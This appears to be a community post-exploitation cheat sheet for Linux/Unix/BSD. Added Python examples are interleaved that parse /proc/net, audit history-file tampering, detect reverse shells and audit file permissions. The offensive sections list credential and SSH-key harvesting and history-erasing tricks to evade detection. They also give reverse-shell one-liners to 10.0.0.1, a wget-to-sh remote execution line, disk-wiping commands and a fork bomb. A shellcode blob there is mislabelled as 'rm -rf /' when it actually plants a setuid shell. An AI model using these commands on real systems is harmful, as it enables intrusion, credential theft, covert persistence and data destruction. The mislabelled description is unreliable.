Linux/Unix/BSD Post Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org
You can download these files in any format using Google Docs: File > Download As
If you are viewing this on anything other than Google Docs, you can get access to the latest links to the Linux/Unix/BSD, OSX, Obscure, Metasploit, and Windows docs here: http://bit.ly/nuc0N0
DISCLAIMER: Anyone can edit these docs, and all that entails and implies
Table of Contents

Information
  Blind Files
  System
  Networking
  User accounts
  Credentials
  Configs
  Determine Distro
  Installed Packages
  Package Sources
  Finding Important Files
Covering Your Tracks
  Avoiding history files
Obtain users information
Escalating
  Looking for possible opened paths
Maintaining control
  Reverse Shell
  Fun if Windows is present and accessible
Stuff to be sorted
  Deleting and Destroying
  Execute a remote script
  Fork Bomb
Information

Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal (Don't forget %00!)

File                       Contents and Reason
/etc/resolv.conf           Contains the current name servers (DNS) for the system. This is a globally
                           readable file that is less likely to trigger IDS alerts than /etc/passwd
/etc/motd                  Message of the Day.
/etc/issue                 Debian: current version of distro
/etc/passwd                List of local users
/etc/shadow                List of users' password hashes (requires root)
/home/xxx/.bash_history    Will give you some directory context
System

Command                    Description and/or Reason
uname -a                   Prints the kernel version, arch, sometimes distro, ...
ps aux                     List all running processes
top -n 1 -d                Print processes; 1 is the number of iterations
id                         Your current username, groups
arch, uname -m             Kernel processor architecture
w                          who is connected, uptime and load avg
who -a                     uptime, runlevel, tty, processes etc.
gcc -v                     Returns the version of GCC.
mysql --version            Returns the version of MySQL.
perl -v                    Returns the version of Perl.
ruby -v                    Returns the version of Ruby.
python --version           Returns the version of Python.
df -k                      mounted fs, size, % use, dev and mountpoint
mount                      mounted fs
last -a                    Last users logged on
lastcomm
lastlog
lastlogin                  (BSD)
getenforce                 Get the status of SELinux (Enforcing, Permissive or Disabled)
dmesg                      Information from the last system boot
lspci                      prints all PCI buses and devices
lsusb                      prints all USB buses and devices
lscpu                      prints CPU information
lshw
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /      (note: can cause heavy disk i/o)
which nmap                 locate a command (ie nmap or nc)
locate bin/nmap
locate bin/nc
jps -l
java -version              Returns the version of Java.
Networking
hostname -f
ip addr show
ip ro show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n -v
iptables -t nat -L -n -v
ip6tables -L -n -v
iptables-save
netstat -anop
netstat -r
netstat -nltupw    (root with raw sockets)
arp -a
lsof -nPi
to resume it: cat /proc/net/*    (more discreet)
What does the above mean? > It means that all the information given by the above commands can be found by looking into the files under /proc/net, and that this approach is less likely to trigger monitoring or other stuff.
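What reading /proc/net actually involves, as an added example that is not part of the original document: the remark above says everything netstat and lsof print is in the files under /proc/net, and this is the decoding a lightweight host monitor does when it wants socket state without spawning netstat. The two sample rows below are constructed; the column layout is the real kernel format for /proc/net/tcp (IPv4 only; /proc/net/tcp6 uses 128-bit addresses and is not handled here).

```python
"""Decode /proc/net/tcp into readable endpoints (added example, not from the page)."""
import socket
import struct
import sys
from typing import List, NamedTuple, Tuple

# "st" column values, from the kernel's tcp_states.h
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}


class TcpEntry(NamedTuple):
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    state: str
    uid: int
    inode: int      # socket inode; /proc/<pid>/fd/* links read "socket:[inode]"


def decode_endpoint(field: str, byteorder: str = "little") -> Tuple[str, int]:
    """'0100007F:0016' -> ('127.0.0.1', 22).

    The kernel prints the IPv4 address as a 32-bit integer in host byte order,
    so on little-endian machines (x86, ARM) the octets read back-to-front."""
    addr_hex, port_hex = field.split(":")
    fmt = "<I" if byteorder == "little" else ">I"
    addr = socket.inet_ntoa(struct.pack(fmt, int(addr_hex, 16)))
    return addr, int(port_hex, 16)


def parse_proc_net_tcp(text: str, byteorder: str = "little") -> List[TcpEntry]:
    entries = []
    for line in text.splitlines():
        fields = line.split()
        # data rows start with the slot number "N:"; the header row does not
        if len(fields) < 10 or not fields[0].endswith(":"):
            continue
        laddr, lport = decode_endpoint(fields[1], byteorder)
        raddr, rport = decode_endpoint(fields[2], byteorder)
        entries.append(TcpEntry(laddr, lport, raddr, rport,
                                TCP_STATES.get(fields[3], fields[3]),
                                int(fields[7]), int(fields[9])))
    return entries


def read_tcp_table(path: str = "/proc/net/tcp") -> List[TcpEntry]:
    """Read the live table; byte order follows the running host."""
    with open(path) as fh:
        return parse_proc_net_tcp(fh.read(), sys.byteorder)


def listening_ports(entries: List[TcpEntry]) -> List[int]:
    return sorted(e.local_port for e in entries if e.state == "LISTEN")


def established_peers(entries: List[TcpEntry]) -> List[Tuple[str, int]]:
    return sorted((e.remote_addr, e.remote_port) for e in entries if e.state == "ESTABLISHED")


# Constructed sample: one listener on 127.0.0.1:22, one outbound connection to port 80
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0A00000A:BB8A 0100000A:0050 01 00000000:00000000 00:00000000 00000000  1000        0 67890 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    for e in parse_proc_net_tcp(SAMPLE):
        print(f"{e.local_addr}:{e.local_port} -> {e.remote_addr}:{e.remote_port} "
              f"{e.state} uid={e.uid} inode={e.inode}")
```

The inode column is the link between this table and processes: lsof and netstat -p resolve it by reading every /proc/<pid>/fd entry and matching "socket:[inode]", which is why those tools are noisier than a plain read of the table.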
User accounts
local accounts: cat /etc/passwd
  password hashes in /etc/shadow on Linux
  password hashes in /etc/security/passwd on AIX
  groups in /etc/group (and/or /etc/gshadow on Linux)
all accounts: getent passwd
  should dump local, LDAP, NIS, whatever the system is using
  same with getent group
Samba's own database: pdbedit -L -w or pdbedit -L -v
privileged accounts: cat
  (above: cat ???)
mail aliases: cat /etc/aliases, find /etc -name aliases, getent aliases
NIS accounts: ypcat passwd displays NIS password file

Credentials
SSH keys, often passwordless: /home/*/.ssh/id*
SSH agent:
Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
PGP keys: /home/*/.gnupg/secring.gpg
Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done    # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
Determine Distro
lsb_release -d                                     # Generic command for all LSB distros
/etc/os-release                                    # Generic for distros using systemd
/etc/issue                                         # Generic but often modified
cat /etc/*release
/etc/SUSE-release                                  # Novell SUSE
/etc/redhat-release, /etc/redhat_version           # RedHat
/etc/fedora-release                                # Fedora
/etc/slackware-release, /etc/slackware-version     # Slackware
/etc/debian_release, /etc/debian_version           # Debian
/etc/mandrake-release                              # Mandrake
/etc/sun-release                                   # Sun JDS
/etc/release                                       # Solaris/Sparc
/etc/gentoo-release                                # Gentoo
/etc/arch-release                                  # Arch Linux (file will be empty)
arch                                               # OpenBSD sample: OpenBSD.amd64
uname -a                                           # often hints at it pretty well

Installed Packages
rpm -qa --last | head
yum list | grep installed
Debian:
dpkg -l
dpkg -l | grep -i linux-image
dpkg --get-selections
{Free,Net}BSD:
pkg_info
Solaris:
pkginfo
Gentoo:
# equery must be installed
cd /var/db/pkg/ && ls -d */*    # always works
Arch Linux:
pacman -Q

Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
Finding Important Files
ls -dlR */
ls -alR | grep ^d
find /var -type d
ls -dl `find /var -type d`
ls -dl `find /var -type d` | grep -v root
find /var ! -user root -type d -ls
find /var/log -type f -exec ls -la {} \;
find / -perm -4000    (find all suid files)
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree; ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$    # Remember to updatedb before running locate
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties    # java config files
locate .xml | grep [.]xml    # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | sed 's/:/ /g'` -perm /6000 -ls    # find suids
locate rhosts
Covering Your Tracks

Avoiding history files
export HISTFILE=
or
unset HISTFILE

This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:
However, if you happen to be on an account that was originally inaccessible, and the .bash_history file is available (ls -a ~), viewing (cat-ing) its contents can provide you with a good deal of information about the system and its most recent updates/changes.

clear all history in ram: history -c
rm -rf ~/.bash_history && ln -s /dev/null ~/.bash_history    (invasive)
touch ~/.bash_history    (invasive)
<space>history -c    (using a space before a command)
zsh% unset HISTFILE HISTSIZE
tcsh% set history=0
bash$ set +o history
ksh$ unset HISTFILE
find / -type f -exec {} \;    (forensics nightmare)

Note that you're probably better off modifying or temporarily disabling rather than deleting history files; it leaves a lot fewer traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$-ing the shell. Sometimes the shell can be configured to run history -w after every command; get around this by overriding history with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
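The responder-side check the section above alludes to ("a lot of folks know to check for tampering with this file"), as an added example that is not part of the original document: it reports history files that are symlinked away, emptied or missing, which are the traces each of the tricks listed leaves behind. demo_fixture() builds a constructed home directory in a temporary folder so the output can be seen without touching a real account; audit_all_homes() runs the same check over /home/* and /root.

```python
"""Audit shell history files for the tampering patterns listed above (added example)."""
import glob
import os
import stat
import tempfile
from typing import Dict, List

# History files the shells and tools in this document write; .bash_history is
# always reported, the others only when present.
HISTORY_FILES = (".bash_history", ".zsh_history", ".sh_history",
                 ".history", ".mysql_history")


def audit_history_file(path: str) -> List[str]:
    """Return findings for one history file (empty list = nothing odd)."""
    try:
        st = os.lstat(path)            # lstat: do not follow the link we are looking for
    except FileNotFoundError:
        return ["missing"]             # rm'ed, or HISTFILE unset for the account's whole life
    except PermissionError:
        return ["unreadable"]          # run as root to see every home
    if stat.S_ISLNK(st.st_mode):
        return [f"symlink to {os.readlink(path)}"]   # the ln -s /dev/null trick
    if not stat.S_ISREG(st.st_mode):
        return ["not a regular file"]
    if st.st_size == 0:
        return ["empty"]               # truncated, or touch'ed back into existence
    return []


def audit_home(home: str) -> Dict[str, List[str]]:
    report = {}
    for name in HISTORY_FILES:
        path = os.path.join(home, name)
        if name == ".bash_history" or os.path.lexists(path):
            report[name] = audit_history_file(path)
    return report


def audit_all_homes(pattern: str = "/home/*") -> Dict[str, Dict[str, List[str]]]:
    """Run audit_home over every directory matching pattern, plus /root."""
    homes = [h for h in glob.glob(pattern) if os.path.isdir(h)] + ["/root"]
    return {h: audit_home(h) for h in homes if os.path.isdir(h)}


def demo_fixture() -> Dict[str, List[str]]:
    """Constructed account: symlinked bash history, empty zsh history,
    untouched mysql history."""
    with tempfile.TemporaryDirectory() as home:
        os.symlink("/dev/null", os.path.join(home, ".bash_history"))
        open(os.path.join(home, ".zsh_history"), "w").close()
        with open(os.path.join(home, ".mysql_history"), "w") as fh:
            fh.write("select 1;\n")
        return audit_home(home)


if __name__ == "__main__":
    for name, findings in demo_fixture().items():
        print(f"{name}: {findings or 'ok'}")
```

As the section itself concludes, the check is only a tripwire: a shell that ships its command lines to syslog (or an auditd execve rule) records them before any of the HISTFILE tricks can apply, and that is the control to rely on.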
Obtain users information
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*    # you can learn a lot from this
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l    # if sudoers is not readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
Escalating

Looking for possible opened paths
ls -alh /root/
sudo -l
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd    # OpenBSD
cat /var/spool/cron/crontabs/* || cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
Maintaining control

Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1    (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.)
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234    # note: need -l on some versions, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
  Listener: Xnest :1
  Add permission to connect: xhost +victimIP
ssh -NR 3333:localhost:22 user@yourhost
nc -e /bin/sh 10.0.0.1 1234
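The trace all of the shells above leave on the host, as an added example that is not part of the original document or of the pentestmonkey list: each one ends up as /bin/sh or bash with stdin/stdout/stderr duplicated onto a socket (os.dup2(s.fileno(), 0..2), "<&3 >&3 2>&3", nc -e) or, in the mkfifo variant, onto pipes. On Linux the kernel exposes that through /proc/<pid>/fd, where the links for fds 0-2 read "socket:[inode]" or "pipe:[inode]" instead of /dev/pts/N. classify_process() is the pure decision, scan_proc() applies it to the live system, and the three fd samples are constructed.

```python
"""Find shells whose standard streams are sockets or pipes (added example)."""
import os
import re
from typing import Dict, List, Optional, Tuple

SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def classify_process(comm: str, cmdline: List[str],
                     fd_links: Dict[int, str]) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious shell, or None.

    comm     -- /proc/<pid>/comm (executable base name)
    cmdline  -- /proc/<pid>/cmdline split on NUL
    fd_links -- os.readlink() results for /proc/<pid>/fd/0, 1, 2
    """
    if comm not in SHELLS:
        return None
    socket_fds = [fd for fd in (0, 1, 2) if SOCKET_RE.match(fd_links.get(fd, ""))]
    if len(socket_fds) >= 2:
        # a shell talking to the network directly is the reverse-shell signature
        return ("high", f"{comm}: stdio fds {socket_fds} are attached to a socket")
    interactive = "-i" in cmdline[1:]
    on_tty = fd_links.get(0, "").startswith(("/dev/pts/", "/dev/tty"))
    if interactive and not on_tty:
        # "sh -i" fed from a pipe or fifo: the mkfifo | nc construction
        return ("medium", f"interactive {comm} with stdin on {fd_links.get(0, '?')!r}, not a tty")
    return None


def scan_proc(proc: str = "/proc") -> List[Tuple[int, str, str]]:
    """Apply classify_process to every readable process; needs root to see all."""
    findings = []
    if not os.path.isdir(proc):
        return findings
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        base = os.path.join(proc, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
            fd_links = {}
            for fd in (0, 1, 2):
                try:
                    fd_links[fd] = os.readlink(os.path.join(base, "fd", str(fd)))
                except OSError:
                    pass        # fd closed, or not our process
        except OSError:
            continue            # process exited, or unreadable without root
        verdict = classify_process(comm, cmdline, fd_links)
        if verdict:
            findings.append((int(pid), verdict[0], verdict[1]))
    return findings


# Constructed /proc/<pid>/fd samples
REVERSE_SHELL_FDS = {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}
LOGIN_SHELL_FDS = {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"}
FIFO_SHELL_FDS = {0: "pipe:[51020]", 1: "pipe:[51021]", 2: "pipe:[51021]"}

if __name__ == "__main__":
    for pid, severity, reason in scan_proc():
        print(f"pid {pid} [{severity}] {reason}")
```

Treat the output as a triage list rather than a verdict: inetd-style services and CGI wrappers legitimately run "sh -c" with socket stdio, so in practice the "high" hits are filtered by parent process and by whether the remote end of the socket (resolvable through /proc/net/tcp by inode) is an expected peer. The xterm/Xnest and ssh -R entries above do not match this pattern at all and need network-side detection instead.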
Fun if Windows is present and accessible
If there is Windows installed and the logged-in user's access level includes those Windows partitions, an attacker can mount them up and do a much deeper information gathering, credential theft and rooting.
Ntfs-3g is useful for mounting NTFS partitions read-write.
TODO: insert details on what to look for
Stuff to be sorted
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

Command                        Output
ps aux                         List of running processes
id                             List current user and group along with user/group id
w                              Show info about who is logged in, what they are doing
who -a                         Print information about users
cat /dev/core > /dev/audio     Makes a sound from the memory content.
                               Usefulness of this??? (none, aside from pissing off the sysadmin, in the very
                               unlikely case that the server has speakers and the legacy OSS driver)
cat /dev/mem > /dev/audio
sudo -p                        allows the user to define what the password prompt will be (useful for fun
                               customization with aliases or shell scripts)
Deleting and Destroying
(If it is necessary to leave the machine inaccessible or unusable)
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble.
Oh, and you're probably a jerk if you use any of the stuff below.

Command                                Description
rm -rf /                               This will recursively try to delete all files.

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
                                       Hex version of rm -rf /
                                       How is this supposed to work?

mkfs.ext3 /dev/sda                     Reformat the device mentioned, making recovery of files hard.
dd if=/dev/zero of=/dev/sda bs=1M      Overwrite disk /dev/sda with zeros

Execute a remote script
wget http://server/file.sh -O - | sh   This command forces the download of a file and immediately its execution; it can be exploited easily, e.g. with a reverse shell.

Fork Bomb
:(){ :|:& };:                          The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
Stolen from: http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf

World writable directories
  Find world writable folders outside your home directory. It would be a tremendous success if we could write, say, to /etc. So we could add configuration files and therefore pretty surely execute code as root, since many daemons read a specific number of primary and secondary configuration files, whereas the secondary ones are often not created yet. If the superuser's home (/root) were writable, we could create shell startup files that don't exist yet: .profile, .bash_profile, .bashrc...
  find / \( -wholename '/home/homedir/*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null

World writable files
  What if /etc/passwd were writable? Yeah, we could just add another root user and we would have won! Whereas the foregoing scenario is just too good to be true, it really makes sense to search for world writable files outside your own territory (= your home directory).
  find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Log files
  Sometimes a security-unaware administrator chmods a sensitive log file because he couldn't view it, and therefore leaks potentially sensitive data such as passwords or other important information.
  find /var/log -type f -perm -0004 2>/dev/null

Setuid/setgid files
  We already examined fully why setuid and setgid files are worth being double checked. Such a file owned by root and susceptible to attacks is a big weakness.
  find / \( -type f -or -type d \) -perm /6000 2>/dev/null
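The four find(1) checks in the table above and the suid searches under "Finding Important Files" written out as one auditor, as an added example that is not part of the original document or of the paper it quotes. It adds two refinements a practitioner wants when running this as a periodic check: world-writable directories that carry the sticky bit (/tmp, /var/tmp) are the expected case and are not reported, and setuid/setgid is tested with "either bit" semantics (find's -perm /6000) rather than "both bits" (-perm -6000); a setgid directory is skipped too, since there it only means group inheritance. The prune list is an assumption and can be replaced with the caller's own.

```python
"""World-writable, world-readable-log and setuid/setgid audit (added example)."""
import os
import stat
from typing import Callable, List, Set, Tuple

# Assumed default: skip pseudo-filesystems and home directories, as the table does
PRUNE_DEFAULT = ("/home", "/proc", "/sys", "/dev", "/run")


def classify_mode(mode: int) -> Set[str]:
    """Tag an st_mode value with the properties the audit cares about."""
    tags = set()
    if stat.S_ISDIR(mode):
        tags.add("dir")
    if mode & stat.S_IWOTH:
        tags.add("world_writable")
    if mode & stat.S_IROTH:
        tags.add("world_readable")
    if mode & stat.S_ISVTX:
        tags.add("sticky")
    if mode & stat.S_ISUID:
        tags.add("suid")
    if mode & stat.S_ISGID:
        tags.add("sgid")
    return tags


def is_weak_permission(mode: int) -> bool:
    """True for the cases the table flags: world-writable file, world-writable
    directory without the sticky bit, setuid anything, setgid regular file."""
    tags = classify_mode(mode)
    if "suid" in tags:
        return True
    if "sgid" in tags and "dir" not in tags:
        return True
    if "world_writable" in tags:
        return not ("dir" in tags and "sticky" in tags)
    return False


def is_readable_log(mode: int) -> bool:
    """The /var/log check: a regular file anyone can read (find -perm -0004)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_IROTH)


def audit_tree(root: str, predicate: Callable[[int], bool] = is_weak_permission,
               prune: Tuple[str, ...] = PRUNE_DEFAULT) -> List[Tuple[str, str]]:
    """Walk root without following symlinks and return (path, octal mode) pairs
    for which predicate(st_mode) holds. Unreadable entries are skipped."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in prune]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue      # a symlink's own mode bits mean nothing
            if predicate(st.st_mode):
                findings.append((path, oct(stat.S_IMODE(st.st_mode))))
    return findings


if __name__ == "__main__":
    for path, mode in audit_tree("/"):
        print(mode, path)
    for path, mode in audit_tree("/var/log", is_readable_log, prune=()):
        print("readable log:", mode, path)
```

Running the suid/sgid pass on a fresh install and diffing later runs against that baseline is the usual way to turn this from a one-off check into a detection: a new setuid file outside the package manager's inventory (compare with dpkg -l or rpm -qa above) is the thing worth an alert, not the well-known set that ships with the distribution.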